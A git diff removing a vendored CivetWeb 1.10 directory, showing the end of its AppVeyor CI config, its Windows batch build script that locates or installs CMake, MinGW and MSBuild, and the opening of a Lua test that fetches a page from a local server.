-    -G "%generator%"

-    -DCMAKE_BUILD_TYPE=%build_type%

-    -DBUILD_SHARED_LIBS=%build_shared%

-    -DCIVETWEB_SERVE_NO_FILES=%no_files%

-    "-DCIVETWEB_THIRD_PARTY_DIR=%third_party_dir:\=\\%"

-    -DCIVETWEB_ENABLE_THIRD_PARTY_OUTPUT=YES

-    -DCIVETWEB_ENABLE_SSL=%enable_ssl%

-    -DCIVETWEB_DISABLE_CGI=%no_cgi%

-    -DCIVETWEB_ENABLE_SSL_DYNAMIC_LOADING=%enable_ssl_dynamic_loading%

-    -DCIVETWEB_ENABLE_WEBSOCKETS=%enable_websockets%

-    -DCIVETWEB_ENABLE_CXX=%enable_cxx%

-    -DCIVETWEB_ENABLE_LUA=%enable_lua%

-    -DCIVETWEB_ENABLE_LUA_SHARED=%enable_lua_shared%

-    -DCIVETWEB_DISABLE_CACHING=%no_caching%

-    -DCIVETWEB_C_STANDARD=%c_standard%

-    -DCIVETWEB_CXX_STANDARD=%cxx_standard%

-    "%source_path%"

-  - powershell Push-AppveyorArtifact CMakeCache.txt

-  - cd "%source_path%"

-

-build_script:

-  - cd

-  - cd "%build_path%"

-  - appveyor AddMessage -Category Information "Build command '%build%'"

-  - cmd /c "%build%"

-  - cd "%source_path%"

-

-test_script:

-  - cd "%build_path%"

-  - appveyor AddMessage -Category Information "Test command '%build%'"

-  - set CTEST_OUTPUT_ON_FAILURE=1

-  - cmd /c "%test%"

-  - cd "%source_path%"

-

-  - set "output_path=%source_path%\output"

-  - set "build_path=%output_path%\build"

-  - set "install_path=%output_path%\install"

-  - set "third_party_dir=C:\third-party"

-

-after_test:

-  - echo "Current directory:"

-  - cd

-  - dir

-  - md dist

-  - if "%build_type%"=="Release" (cmake "-DCMAKE_INSTALL_PREFIX=%install_path%" -P "%build_path%/cmake_install.cmake")

-  - dir dist\

-  - echo "Output directory:"

-  - dir %output_path%

-  - echo "Build directory:"

-  - dir %build_path%

-  - if "%build_type%"=="Release" (echo "Install directory:")

-  - if "%build_type%"=="Release" (dir %install_path%)

-  - if "%build_type%"=="Release" (dir %install_path%\bin)

-  - if "%build_type%"=="Release" (dir %install_path%\include)

-  - if "%build_type%"=="Release" (dir %install_path%\lib)

-  - if "%build_type%"=="Release" (copy "%install_path%"\include dist\)

-  - if "%build_type%"=="Release" (copy "%install_path%"\bin\*.exe dist\)

-  - echo "Dist directory:"

-  - dir dist\

-

-matrix:

-  fast_finish: false

-

-cache:

-  - C:\mingw-builds -> mingw.cmd

-  - C:\third-party -> **\CMakeLists.txt

-  - C:\ssl

-

-artifacts:

-  - path: dist\*

-

diff --git a/thirdparty/civetweb-1.10/build.cmd b/thirdparty/civetweb-1.10/build.cmd
deleted file mode 100644
index 8ccf0e4..0000000
--- a/thirdparty/civetweb-1.10/build.cmd
+++ /dev/null
@@ -1,866 +0,0 @@
-:: Make sure the extensions are enabled
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :print_usage "Failed to enable extensions"
-  exit /b 1
-)
-
-::Change the code page to unicode
-@chcp 65001 1>nul 2>nul
-@if errorlevel 1 (
-  call :print_usage "Failed to change the code page to unicode"
-  exit /b 1
-)
-
-:: Set up some global variables
-@set project=civetweb
-@set "script_name=%~nx0"
-@set "script_folder=%~dp0"
-@set "script_folder=%script_folder:~0,-1%"
-@set "output_path=%script_folder%\output"
-@set "build_path=%output_path%\build"
-@set "install_path=%output_path%\install"
-@set build_shared=OFF
-@set build_type=Release
-@set dependency_path=%TEMP%\%project%-build-dependencies
-
-:: Check the command line parameters
-@set logging_level=1
-@set "options=%* "
-@if not "!options!"=="!options:/? =!" set usage="Convenience script to build %project% with CMake"
-@for %%a in (%options%) do @(
-  @set arg=%%~a
-  @set arg=!arg: =!
-  @set one=!arg:~0,1!
-  @set two=!arg:~0,2!
-  @if /i [!arg!] == [/q] set quiet=true
-  @if /i [!two!] == [/v] call :verbosity "!arg!"
-  @if /i [!arg!] == [/s] set build_shared=ON
-  @if /i [!arg!] == [/d] set build_type=Debug
-  @if /i not [!one!] == [/] (
-    if not defined generator (
-      set generator=!arg!
-    ) else (
-      set usage="Too many generators: !method! !arg!" ^
-                "There should only be one generator parameter"
-    )
-  )
-)
-@if defined quiet (
-  set logging_level=0
-)
-@if not defined generator (
-  set generator=MSVC
-)
-@if /i not [%generator%] == [MinGW] (
-  if /i not [%generator%] == [MSVC] (
-    call :print_usage "Invalid argument: %generator%"
-    exit /b 1
-  )
-)
-
-:: Set up the logging
-@set log_folder=%output_path%\logs
-@call :iso8601 timestamp
-@set log_path=%log_folder%\%timestamp%.log
-@set log_keep=10
-
-:: Only keep a certain amount of logs
-@set /a "log_keep=log_keep-1"
-@if not exist %log_folder% @mkdir %log_folder%
-@for /f "skip=%log_keep%" %%f in ('dir /b /o-D /tc %log_folder%') do @(
-  call :log 4 "Removing old log file %log_folder%\%%f"
-  del %log_folder%\%%f
-)
-
-:: Set up some more global variables
-@call :architecture arch
-@call :windows_version win_ver win_ver_major win_ver_minor win_ver_rev
-@call :script_source script_source
-@if [%script_source%] == [explorer] (
-  set /a "logging_level=logging_level+1"
-)
-
-:: Print the usage or start the script
-@set exit_code=0
-@if defined usage (
-  call :print_usage %usage%
-) else (
-  call :main
-  @if errorlevel 1 (
-    @call :log 0 "Failed to build the %project% project"
-    @set exit_code=1
-  )
-)
-
-:: Tell the user where the built files are
-@call :log 5
-@call :log 0 "The built files are available in %install_path%"
-
-:: Stop the script if the user double clicked
-@if [%script_source%] == [explorer] (
-  pause
-)
-
-@exit /b %exit_code%
-@endlocal
-@goto :eof
-
-:: -------------------------- Functions start here ----------------------------
-
-:main - Main function that performs the build
-@setlocal
-@call :log 6
-@call :log 2 "Welcome to the %project% build script"
-@call :log 6 "------------------------------------"
-@call :log 6
-@call :log 2 "This script builds the project using CMake"
-@call :log 6
-@call :log 2 "Generating %generator%..."
-@call :log 6
-@set methods=dependencies ^
-             generate ^
-             build ^
-             install
-@for %%m in (%methods%) do @(
-  call :log 3 "Excuting the '%%m' method"
-  call :log 8
-  call :%%~m
-  if errorlevel 1 (
-    call :log 0 "Failed to complete the '%%~m' dependency routine"
-    call :log 0 "View the log at %log_path%"
-    exit /b 1
-  )
-)
-@call :log 6 "------------------------------------"
-@call :log 2 "Build complete"
-@call :log 6
-@endlocal
-@goto :eof
-
-:print_usage - Prints the usage of the script
-:: %* - message to print, each argument on it's own line
-@setlocal
-@for %%a in (%*) do @echo.%%~a
-@echo.
-@echo.build [/?][/v[v...]^|/q][MinGW^|MSVC]
-@echo.
-@echo.  [MinGW^|(MSVC)]
-@echo.              Builds the library with one of the compilers
-@echo.  /s          Builds shared libraries
-@echo.  /d          Builds a debug variant of the project
-@echo.  /v          Sets the output to be more verbose
-@echo.  /v[v...]    Extra verbosity, /vv, /vvv, etc
-@echo.  /q          Quiets the output
-@echo.  /?          Shows this usage message
-@echo.
-@endlocal
-@goto :eof
-
-:dependencies - Installs any prerequisites for the build
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 5
-@call :log 0 "Installing dependencies for %generator%"
-@if /i [%generator%] == [MinGW] (
-  call :mingw compiler_path
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find MinGW"
-    @exit /b 1
-  )
-  set "PATH=!compiler_path!;%PATH%"
-  @call :find_in_path gcc_executable gcc.exe
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find gcc.exe"
-    @exit /b 1
-  )
-)
-@if [%reboot_required%] equ [1] call :reboot
-@endlocal & set "PATH=%PATH%"
-@goto :eof
-
-:generate - Uses CMake to generate the build files
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 5
-@call :log 0 "Generating CMake files for %generator%"
-@call :cmake cmake_executable
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Need CMake to create the build files"
-  @exit /b 1
-)
-@if /i [%generator%] == [MinGW] @(
-  @set "generator_var=-G "MinGW Makefiles^""
-)
-@if /i [%generator%] == [MSVC] @(
-  rem We could figure out the correct MSVS generator here
-)
-@call :iso8601 iso8601
-@set output=%temp%\cmake-%iso8601%.log
-@if not exist %build_path% mkdir %build_path%
-@cd %build_path%
-@"%cmake_executable%" ^
-  !generator_var! ^
-  -DCMAKE_BUILD_TYPE=!build_type! ^
-  -DBUILD_SHARED_LIBS=!build_shared! ^
-  "%script_folder%" > "%output%"
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Failed to generate build files with CMake"
-  @call :log_append "%output%"
-  @cd %script_folder%
-  @exit /b 1
-)
-@cd %script_folder%
-@endlocal
-@goto :eof
-
-:build - Builds the library
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 5
-@call :log 0 "Building %project% with %generator%"
-@if /i [%generator%] == [MinGW] @(
-  @call :find_in_path mingw32_make_executable mingw32-make.exe
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find mingw32-make"
-    @exit /b 1
-  )
-  @set "build_command=^"!mingw32_make_executable!^" all test"
-)
-@if /i [%generator%] == [MSVC] @(
-  @call :msbuild msbuild_executable
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find MSBuild"
-    @exit /b 1
-  )
-  @set "build_command=^"!msbuild_executable!^" /m:4 /p:Configuration=%build_type% %project%.sln"
-)
-@if not defined build_command (
-  @call :log 5
-  @call :log 0 "No build command for %generator%"
-  @exit /b 1
-)
-@cd %build_path%
-@call :iso8601 iso8601
-@set output=%temp%\build-%iso8601%.log
-@call :log 7
-@call :log 2 "Build command: %build_command:"=%"
-@%build_command% > "%output%"
-@if errorlevel 1 (
-  @call :log_append "%output%"
-  @call :log 5
-  @call :log 0 "Failed to complete the build"
-  @exit /b 1
-)
-@call :log_append "%output%"
-@cd %script_folder%
-@endlocal
-@goto :eof
-
-:install - Installs the built files
-@setlocal
-@call :log 5
-@call :log 0 "Installing built files"
-@call :cmake cmake_executable
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Need CMake to install the built files"
-  @exit /b 1
-)
-@call :iso8601 iso8601
-@set output=%temp%\install-%iso8601%.log
-@"%cmake_executable%" ^
-  "-DCMAKE_INSTALL_PREFIX=%install_path%" ^
-  -P "%build_path%/cmake_install.cmake" ^
-  > "%output%"
-@if errorlevel 1 (
-  @call :log_append "%output%"
-  @call :log 5
-  @call :log 0 "Failed to install the files"
-  @exit /b 1
-)
-@call :log_append "%output%"
-@endlocal
-@goto :eof
-
-:script_source - Determines if the script was ran from the cli or explorer
-:: %1 - The return variable [cli|explorer]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 3 "Attempting to detect the script source"
-@echo "The invocation command was: '%cmdcmdline%'" >> %log_path%
-@for /f "tokens=1-3,*" %%a in ("%cmdcmdline%") do @(
-  set cmd=%%~a
-  set arg1=%%~b
-  set arg2=%%~c
-  set rest=%%~d
-)
-@set quote="
-@if "!arg2:~0,1!" equ "!quote!" (
-  if "!arg2:~-1!" neq "!quote!" (
-    set "arg2=!arg2:~1!"
-  )
-)
-@call :log 4 "cmd  = %cmd%"
-@call :log 4 "arg1 = %arg1%"
-@call :log 4 "arg2 = %arg2%"
-@call :log 4 "rest = %rest%"
-@call :log 4 "src  = %~f0"
-@if /i "%arg2%" == "call" (
-  set script_source=cli
-) else (
-  @if /i "%arg1%" == "/c" (
-    set script_source=explorer
-  ) else (
-    set script_source=cli
-  )
-)
-@call :log 3 "The script was invoked from %script_source%"
-@endlocal & set "%~1=%script_source%"
-@goto :eof
-
-:architecture - Finds the system architecture
-:: %1 - The return variable [x86|x86_64]
-@setlocal
-@call :log 3 "Determining the processor architecture"
-@set "key=HKLM\System\CurrentControlSet\Control\Session Manager\Environment"
-@set "var=PROCESSOR_ARCHITECTURE"
-@for /f "skip=2 tokens=2,*" %%a in ('reg query "%key%" /v "%var%"') do @set "arch=%%b"
-@if "%arch%" == "AMD64" set arch=x86_64
-@call :log 4 "arch = %arch%"
-@endlocal & set "%~1=%arch%"
-@goto :eof
-
-:md5 - Gets the MD5 checksum for a file
-:: %1 - The hash
-:: %2 - The file path
-@setlocal
-@set var=%~1
-@set file_path=%~2
-@if [%var%] == [] exit /b 1
-@if "%file_path%" == "" exit /b 1
-@if not exist "%file_path%" exit /b 1
-@for /f "skip=3 tokens=1,*" %%a in ('powershell Get-FileHash -Algorithm MD5 "'%file_path%'"') do @set hash=%%b
-@if not defined hash (
-  call :log 6
-  call :log 0 "Failed to get MD5 hash for %file_path%"
-  exit /b 1
-)
-@endlocal & set "%var%=%hash: =%"
-@goto :eof
-
-:windows_version - Checks the windows version
-:: %1 - The windows version
-:: %2 - The major version number return variable
-:: %3 - The minor version number return variable
-:: %4 - The revision version number return variable
-@setlocal
-@call :log 3 "Retrieving the Windows version"
-@for /f "tokens=2 delims=[]" %%x in ('ver') do @set win_ver=%%x
-@set win_ver=%win_ver:Version =%
-@set win_ver_major=%win_ver:~0,1%
-@set win_ver_minor=%win_ver:~2,1%
-@set win_ver_rev=%win_ver:~4%
-@call :log 4 "win_ver = %win_ver%"
-@endlocal & set "%~1=%win_ver%" ^
-          & set "%~2=%win_ver_major%" ^
-          & set "%~3=%win_ver_minor%" ^
-          & set "%~4=%win_ver_rev%"
-@goto :eof
-
-:find_in_path - Finds a program of file in the PATH
-@setlocal
-@set var=%~1
-@set file=%~2
-@if [%var%] == [] exit /b 1
-@if [%file%] == [] exit /b 1
-@call :log 3 "Searching PATH for %file%"
-@for %%x in ("%file%") do @set "file_path=%%~f$PATH:x"
-@if not defined file_path exit /b 1
-@endlocal & set "%var%=%file_path%"
-@goto :eof
-
-:administrator_check - Checks for administrator priviledges
-@setlocal
-@call :log 2 "Checking for administrator priviledges"
-@set "key=HKLM\Software\VCA\Tool Chain\Admin Check"
-@reg add "%key%" /v Elevated /t REG_DWORD /d 1 /f > nul 2>&1
-@if errorlevel 1 exit /b 1
-@reg delete "%key%" /va /f > nul 2>&1
-@endlocal
-@goto :eof
-
-:log_append - Appends another file into the current logging file
-:: %1 - the file_path to the file to concatenate
-@setlocal
-@set "file_path=%~1"
-@if [%file_path%] == [] exit /b 1
-@call :log 3 "Appending to log: %file_path%"
-@call :iso8601 iso8601
-@set "temp_log=%temp%\append-%iso8601%.log"
-@call :log 4 "Using temp file %temp_log%"
-@type "%log_path%" "%file_path%" > "%temp_log%" 2>nul
-@move /y "%temp_log%" "%log_path%" 1>nul
-@del "%file_path%" 2>nul
-@del "%temp_log%" 2>nul
-@endlocal
-@goto :eof
-
-:iso8601 - Returns the current time in ISO8601 format
-:: %1 - the return variable
-:: %2 - format [extended|basic*]
-:: iso8601 - contains the resulting timestamp
-@setlocal
-@wmic Alias /? >NUL 2>&1 || @exit /b 1
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "format=%~2"
-@if "%format%" == "" set format=basic
-@for /F "skip=1 tokens=1-6" %%g IN ('wmic Path Win32_UTCTime Get Day^,Hour^,Minute^,Month^,Second^,Year /Format:table') do @(
-  @if "%%~l"=="" goto :iso8601_done
-  @set "yyyy=%%l"
-  @set "mm=00%%j"
-  @set "dd=00%%g"
-  @set "hour=00%%h"
-  @set "minute=00%%i"
-  @set "seconds=00%%k"
-)
-:iso8601_done
-@set mm=%mm:~-2%
-@set dd=%dd:~-2%
-@set hour=%hour:~-2%
-@set minute=%minute:~-2%
-@set seconds=%seconds:~-2%
-@if /i [%format%] == [extended] (
-  set iso8601=%yyyy%-%mm%-%dd%T%hour%:%minute%:%seconds%Z
-) else (
-  if /i [%format%] == [basic] (
-    set iso8601=%yyyy%%mm%%dd%T%hour%%minute%%seconds%Z
-  ) else (
-    @exit /b 1
-  )
-)
-@set iso8601=%iso8601: =0%
-@endlocal & set %var%=%iso8601%
-@goto :eof
-
-:verbosity - Processes the verbosity parameter '/v[v...]
-:: %1 - verbosity given on the command line
-:: logging_level - set to the number of v's
-@setlocal
-@set logging_level=0
-@set verbosity=%~1
-:verbosity_loop
-@set verbosity=%verbosity:~1%
-@if not [%verbosity%] == [] @(
-  set /a "logging_level=logging_level+1"
-  goto verbosity_loop
-)
-@endlocal & set logging_level=%logging_level%
-@goto :eof
-
-:log - Logs a message, depending on verbosity
-:: %1 - level
-::       [0-4] for CLI logging
-::       [5-9] for GUI logging
-:: %2 - message to print
-@setlocal
-@set "level=%~1"
-@set "msg=%~2"
-@if "%log_folder%" == "" (
-  echo Logging was used to early in the script, log_folder isn't set yet
-  goto :eof
-)
-@if "%log_path%" == "" (
-  echo Logging was used to early in the script, log_path isn't set yet
-  goto :eof
-)
-@if not exist "%log_folder%" mkdir "%log_folder%"
-@if not exist "%log_path%" echo. 1>nul 2>"%log_path%"
-@echo.%msg% >> "%log_path%"
-@if %level% geq 5 (
-  @if [%script_source%] == [explorer] (
-    set /a "level=level-5"
-  ) else (
-    @goto :eof
-  )
-)
-@if "%logging_level%" == "" (
-  echo Logging was used to early in the script, logging_level isn't set yet
-  goto :eof
-)
-@if %logging_level% geq %level% echo.%msg% 1>&2
-@endlocal
-@goto :eof
-
-
-:start_browser - Opens the default browser to a URL
-:: %1 - the url to open
-@setlocal
-@set url=%~1
-@call :log 4 "Opening default browser: %url%"
-@start %url%
-@endlocal
-@goto :eof
-
-:find_cmake - Finds cmake on the command line or in the registry
-:: %1 - the cmake file path
-@setlocal
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :log 6
-@call :log 6 "Finding CMake"
-@call :log 6 "--------------"
-@call :find_in_path cmake_executable cmake.exe
-@if not errorlevel 1 goto found_cmake
-@for /l %%i in (5,-1,0) do @(
-@for /l %%j in (9,-1,0) do @(
-@for /l %%k in (9,-1,0) do @(
-@for %%l in (HKCU HKLM) do @(
-@for %%m in (SOFTWARE SOFTWARE\Wow6432Node) do @(
-  @reg query "%%l\%%m\Kitware\CMake %%i.%%j.%%k" /ve > nul 2>nul
-  @if not errorlevel 1 (
-    @for /f "skip=2 tokens=2,*" %%a in ('reg query "%%l\%%m\Kitware\CMake %%i.%%j.%%k" /ve') do @(
-      @if exist "%%b\bin\cmake.exe" (
-        @set "cmake_executable=%%b\bin\cmake.exe"
-        goto found_cmake
-      )
-    )
-  )
-)))))
-@call :log 5
-@call :log 0 "Failed to find cmake"
-@exit /b 1
-:found_cmake
-@endlocal & set "%var%=%cmake_executable%"
-@goto :eof
-
-:cmake - Finds cmake and installs it if necessary
-:: %1 - the cmake file path
-@setlocal
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :log 6
-@call :log 6 "Checking for CMake"
-@call :log 6 "------------------"
-@call :find_cmake cmake_executable cmake.exe
-@if not errorlevel 1 goto got_cmake
-@set checksum=C00267A3D3D9619A7A2E8FA4F46D7698
-@set version=3.2.2
-@call :install_nsis cmake http://www.cmake.org/files/v%version:~0,3%/cmake-%version%-win32-x86.exe %checksum%
-@if errorlevel 1 (
-  call :log 5
-  call :log 0 "Failed to install cmake"
-  @exit /b 1
-)
-@call :find_cmake cmake_executable cmake.exe
-@if not errorlevel 1 goto got_cmake
-@call :log 5
-@call :log 0 "Failed to check for cmake"
-@exit /b 1
-:got_cmake
-@endlocal & set "%var%=%cmake_executable%"
-@goto :eof
-
-:mingw - Finds MinGW, installing it if needed
-:: %1 - the compiler path that should be added to PATH
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :log 6
-@call :log 6 "Checking for MinGW"
-@call :log 6 "------------------"
-@call :find_in_path gcc_executable gcc.exe
-@if not errorlevel 1 (
-  @for %%a in ("%gcc_executable%") do @set "compiler_path=%%~dpa"
-  goto got_mingw
-)
-@call :log 7
-@call :log 2 "Downloading MinGW"
-@if %logging_level% leq 1 set "logging=/q"
-@if %logging_level% gtr 1 set "logging=/v"
-@set output_path=
-@for /f %%a in ('call
-    "%script_folder%\mingw.cmd"
-    %logging%
-    /arch "%arch%"
-    "%dependency_path%"'
-) do @set "compiler_path=%%a\"
-@if not defined compiler_path (
-  @call :log_append "%output%"
-  @call :log 5
-  @call :log 0 "Failed to download MinGW"
-  @exit /b 1
-)
-:got_mingw
-@call :log 5
-@call :log 0 "Found MinGW: %compiler_path%gcc.exe"
-@endlocal & set "%var%=%compiler_path%"
-@goto :eof
-
-:msbuild - Finds MSBuild
-:: %1 - the path to MSBuild executable
-@setlocal
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :find_in_path msbuild_executable msbuild.exe
-@if not errorlevel 1 goto got_msbuild
-@for /l %%i in (20,-1,4) do @(
-@for /l %%j in (9,-1,0) do @(
-@for %%k in (HKCU HKLM) do @(
-@for %%l in (SOFTWARE SOFTWARE\Wow6432Node) do @(
-  @reg query "%%k\%%l\Microsoft\MSBuild\%%i.%%j" /v MSBuildOverrideTasksPath > nul 2>nul
-  @if not errorlevel 1 (
-    @for /f "skip=2 tokens=2,*" %%a in ('reg query "%%k\%%l\Microsoft\MSBuild\%%i.%%j" /v MSBuildOverrideTasksPath') do @(
-      @if exist "%%bmsbuild.exe" (
-        @set "msbuild_executable=%%bmsbuild.exe"
-        goto got_msbuild
-      )
-    )
-  )
-))))
-@call :log 5
-@call :log 0 "Failed to check for MSBuild"
-@exit /b 1
-:got_msbuild
-@endlocal & set "%var%=%msbuild_executable%"
-@goto :eof
-
-:download - Downloads a file from the internet
-:: %1 - the url of the file to download
-:: %2 - the file to download to
-:: %3 - the MD5 checksum of the file (optional)
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :print_usage "Failed to enable extensions"
-  exit /b 1
-)
-@set url=%~1
-@set file_path=%~2
-@set checksum=%~3
-@for %%a in (%file_path%) do @set dir_path=%%~dpa
-@for %%a in (%file_path%) do @set file_name=%%~nxa
-@if [%url%] == [] exit /b 1
-@if [%file_path%] == [] exit /b 1
-@if [%dir_path%] == [] exit /b 1
-@if [%file_name%] == [] exit /b 1
-@if not exist "%dir_path%" mkdir "%dir_path%"
-@call :log 1 "Downloading %url%"
-@call :iso8601 iso8601
-@set temp_path=%temp%\download-%iso8601%-%file_name%
-@call :log 3 "Using temp file %temp_path%"
-@powershell Invoke-WebRequest "%url%" -OutFile %temp_path%
-@if errorlevel 1 (
-  call :log 0 "Failed to download %url%"
-  exit /b 1
-)
-@if [%checksum%] neq [] (
-  @call :log 4 "Checking %checksum% against %temp_path%"
-  @call :md5 hash "%temp_path%"
-  if "!hash!" neq "%checksum%" (
-    call :log 0 "Failed to match checksum: %temp_path%"
-    call :log 0 "Hash    : !hash!"
-    call :log 0 "Checksum: %checksum%"
-    exit /b 1
-  ) else (
-    call :log 3 "Checksum matched: %temp_path%"
-    call :log 3 "Hash    : !hash!"
-    call :log 3 "Checksum: %checksum%"
-  )
-)
-@call :log 4 "Renaming %temp_path% to %file_path%"
-@move /y "%temp_path%" "%file_path%" 1>nul
-@endlocal
-@goto :eof
-
-:install_msi - Installs a dependency from an Microsoft Installer package (.msi)
-:: %1 - [string] name of the project to install
-:: %2 - The location of the .msi, a url must start with 'http://' or file_path
-:: %3 - The checksum of the msi (optional)
-@setlocal
-@set name=%~1
-@set file_path=%~2
-@set checksum=%~3
-@set msi=%~nx2
-@set msi_path=%dependency_path%\%msi%
-@if [%name%] == [] exit /b 1
-@if [%file_path%] == [] exit /b 1
-@if [%msi%] == [] exit /b 1
-@if [%msi_path%] == [] exit /b 1
-@for %%x in (msiexec.exe) do @set "msiexec_path=%%~f$PATH:x"
-@if "msiexec_path" == "" (
-  call :log 0 "Failed to find the Microsoft package installer (msiexec.exe)"
-  call :log 6
-  call :log 0 "Please install it from the Microsoft Download center"
-  call :log 6
-  choice /C YN /T 60 /D N /M "Would you like to go there now?"
-  if !errorlevel! equ 1 call :start_browser ^
-    "http://search.microsoft.com/DownloadResults.aspx?q=Windows+Installer"
-  exit /b 1
-)
-@call :log 6
-@call :log 1 "Installing the '%name%' dependency"
-@call :log 6 "-------------------------------------"
-@call :administrator_check
-@if errorlevel 1 (
-  call :log 0 "You must run %~nx0 in elevated mode to install '%name%'"
-  call :log 5 "Right-Click and select 'Run as Administrator'
-  call :log 0 "Install the dependency manually by running %file_path%"
-  @exit /b 740
-)
-@if [%file_path:~0,4%] == [http] (
-  if not exist "%msi_path%" (
-    call :download "%file_path%" "%msi_path%" %checksum%
-    if errorlevel 1 (
-      call :log 0 "Failed to download the %name% dependency"
-      exit /b 1
-    )
-  )
-) else (
-  call :log 2 "Copying MSI %file_path% to %msi_path%"
-  call :log 7
-  if not exist "%msi_path%" (
-    xcopy /q /y /z "%file_path%" "%msi_path%" 1>nul
-    if errorlevel 1 (
-      call :log 0 "Failed to copy the Microsoft Installer"
-      exit /b 1
-    )
-  )
-)
-@call :log 1 "Running the %msi%"
-@call :log 6
-@set msi_log=%temp%\msiexec-%timestamp%.log
-@call :log 3 "Logging to: %msi_log%"
-@msiexec /i "%msi_path%" /passive /log "%msi_log%" ALLUSERS=1
-@set msi_errorlevel=%errorlevel%
-@call :log_append "%msi_log%"
-@if %msi_errorlevel% equ 0 goto install_msi_success
-@if %msi_errorlevel% equ 3010 goto install_msi_success_reboot
-@if %msi_errorlevel% equ 1641 goto install_msi_success_reboot
-@if %msi_errorlevel% equ 3015 goto install_msi_in_progress_reboot
-@if %msi_errorlevel% equ 1615 goto install_msi_in_progress_reboot
-@call :log 0 "Microsoft Installer failed: %msi_errorlevel%"
-@call :log 0 "Install the dependency manually by running %msi_path%"
-@exit /b 1
-:install_msi_in_progress_reboot
-@call :log 0 "The installation requires a reboot to continue"
-@call :log 5
-@call :reboot
-@exit /b 1
-:install_msi_success_reboot
-@call :log 3 "The installation requires a reboot to be fully functional"
-@set reboot_required=1
-:install_msi_success
-@call :log 2 "Successfully installed %name%"
-@call :log 7
-@endlocal & set reboot_required=%reboot_required%
-@goto :eof
-
-:install_nsis - Installs a dependency from an Nullsoft Installer package (.exe)
-:: %1 - [string] name of the project to install
-:: %2 - The location of the .exe, a url must start with 'http://' or file_path
-:: %3 - The checksum of the exe (optional)
-@setlocal
-@set name=%~1
-@set file_path=%~2
-@set checksum=%~3
-@set exe=%~nx2
-@set exe_path=%dependency_path%\%exe%
-@if [%name%] == [] exit /b 1
-@if [%file_path%] == [] exit /b 1
-@if [%exe%] == [] exit /b 1
-@if [%exe_path%] == [] exit /b 1
-@call :log 6
-@call :log 1 "Installing the '%name%' dependency"
-@call :log 6 "-------------------------------------"
-@call :administrator_check
-@if errorlevel 1 (
-  call :log 0 "You must run %~nx0 in elevated mode to install '%name%'"
-  call :log 5 "Right-Click and select 'Run as Administrator'
-  call :log 0 "Install the dependency manually by running %file_path%"
-  @exit /b 740
-)
-@if [%file_path:~0,4%] == [http] (
-  if not exist "%exe_path%" (
-    call :download "%file_path%" "%exe_path%" %checksum%
-    if errorlevel 1 (
-      call :log 0 "Failed to download the %name% dependency"
-      exit /b 1
-    )
-  )
-) else (
-  call :log 2 "Copying installer %file_path% to %exe_path%"
-  call :log 7
-  if not exist "%exe_path%" (
-    xcopy /q /y /z "%file_path%" "%exe_path%" 1>nul
-    if errorlevel 1 (
-      call :log 0 "Failed to copy the Nullsoft Installer"
-      exit /b 1
-    )
-  )
-)
-@call :log 1 "Running the %exe%"
-@call :log 6
-@"%exe_path%" /S
-@set nsis_errorlevel=%errorlevel%
-@if %nsis_errorlevel% equ 0 goto install_nsis_success
-@if %nsis_errorlevel% equ 3010 goto install_nsis_success_reboot
-@if %nsis_errorlevel% equ 1641 goto install_nsis_success_reboot
-@if %nsis_errorlevel% equ 3015 goto install_nsis_in_progress_reboot
-@if %nsis_errorlevel% equ 1615 goto install_nsis_in_progress_reboot
-@call :log 0 "Nullsoft Installer failed: %nsis_errorlevel%"
-@call :log 0 "Install the dependency manually by running %exe_path%"
-@exit /b 1
-:install_nsis_in_progress_reboot
-@call :log 0 "The installation requires a reboot to continue"
-@call :log 5
-@call :reboot
-@exit /b 1
-:install_nsis_success_reboot
-@call :log 3 "The installation requires a reboot to be fully functional"
-@set reboot_required=1
-:install_nsis_success
-@call :log 2 "Successfully installed %name%"
-@call :log 7
-@endlocal & set reboot_required=%reboot_required%
-@goto :eof
-
-:reboot - Asks the user if they would like to reboot then stops the script
-@setlocal
-@call :log 6 "-------------------------------------------"
-@choice /C YN /T 60 /D N /M "The %method% requires a reboot, reboot now?"
-@set ret=%errorlevel%
-@call :log 6
-@if %ret% equ 1 (
-  @shutdown /r
-) else (
-  @call :log 0 "You will need to reboot to complete the %method%"
-  @call :log 5
-)
-@endlocal
-@goto :eof
diff --git a/thirdparty/civetweb-1.10/ci/test/01_basic/basic_spec.lua b/thirdparty/civetweb-1.10/ci/test/01_basic/basic_spec.lua
deleted file mode 100644
index cf3b300..0000000
--- a/thirdparty/civetweb-1.10/ci/test/01_basic/basic_spec.lua
+++ /dev/null
@@ -1,35 +0,0 @@
-civet = require "ci/test/civet"
-local curl = require "cURL"
-
-describe("civetweb basic", function()
-
-  setup(function()
-    civet.start()
-  end)
-
-  teardown(function()
-    civet.stop()
-  end)
-
-
-  it("should serve a simple get request", function()
-
-    local out = ""
-    function capture(str)
-      out = out .. str
-    end
-
-    local c = curl.easy()
-      :setopt_url('http://localhost:' .. civet.port .. "/")
-      :setopt_writefunction(capture)
-      :perform()
-    :close()
-
-    --print('rescode:' .. c.getinfo(curl.INFO_RESPONSE_CODE))
-
